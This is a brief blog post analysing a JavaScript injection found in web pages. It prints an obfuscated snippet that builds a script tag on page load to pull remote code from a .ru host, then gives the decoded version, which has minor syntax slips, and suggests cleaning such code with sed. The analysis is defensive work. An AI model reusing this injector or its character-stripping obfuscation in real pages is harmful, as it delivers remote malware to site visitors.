Malware Attack, Reply Comment
I refer to the recent comment from my previous malware attack posted 1.5 years ago. Basically the obscure script carried out a lot of substitutions to avoid any firewall filter.
Below is a sample my friend sent me 3 months ago.
/*GNU GPL*/ try{window.onload = function(){var Qq73s8yh02ptue2rq = document.createElement('s&(^c@#r$^i(@)p&@t($&'.replace(/#|\!|\(|&|@|\$|\ ^|\)/ig, ''));Qq73s8yh02ptue2rq.setAttribute('type', 'text/javascript');Qq73s8yh02ptue2rq.setAttribute('src', 'h!!t(#(t#)^p(^!(:&$/$$$/$@)&h!^c&3$6^))#^0&-@!&c!o$()m&^&.))g(l^((o)b&$ #e&!)@7#^.!(c)##)o@)m#^.(@$k#(&)i^n$)#o^^@(-#)&$t@@^o)!.!@$^v)&i!@)e^#w& h$&o&&m)((e#s)$!a@$l^^e).$(r)^&u(:(((!8&^@0!!8)))0^/#!)f#@r!i&&!)e$n&d&f !$e&#e)$d)^.!c(^o)()^m^/@$f#(^!r#^@&@i(^e&n@(&(d$!f&!#e#!e@@$#@d).^!c#^^ ^o^@!!m)($/$b!l#u^^$^e&$@@#h@^o))&!s#@$$t&#.@@@c)^(&o@m()^/$(^v^^$#e#o$# h)(&.^$@c)(o^$)$m&/#g(!^o^^o!(^g@!&l!^#!^e&.&@c)!o)@&m!/(#!^^'.replace(/ \$|\(|@|\!|\)|#|\^|&/ig, ''));Qq73s8yh02ptue2rq.setAttribute('defer', 'defer');Qq73s8yh02ptue2rq.setAttribute('id', 'U&!^(y&$2(#3^9#^b)$$x^#k#^@9##)5(&t#@'.replace(/&|\!|\)|\^|\(|\$|@|#/ig , ''));document.body.appendChild(Qq73s8yh02ptue2rq);}} catch(e) {}
After ran through the browser JavaScript interpreter, you will get the below. It will dynamically create a <script> element which will be load up automatically.
/*GNU GPL*/ try{window.onload = function(){ var Qq73s8yh02ptue2rq = document.createElement('script')); Qq73s8yh02ptue2rq.setAttribute('type','text/javascript'); Qq73s8yh02ptue2rq.setAttribute('src','http://hc360-com.globe7.com.kino-to.viewhomesale.ru:8080/friendfeed.com/friendfeed.com/bluehost.com/veoh.com/google.com/')); Qq73s8yh02ptue2rq.setAttribute('defer','defer'); Qq73s8yh02ptue2rq.setAttribute('id','Uy239bxk95t'); document.body.appendChild(doc);} } catch(e) {}
If your html/js appear to have any window.onload which does not belong to your own stuff, you can apply the same trick by running 'sed' to clean it up.
0 Comments:
Post a Comment
<< Home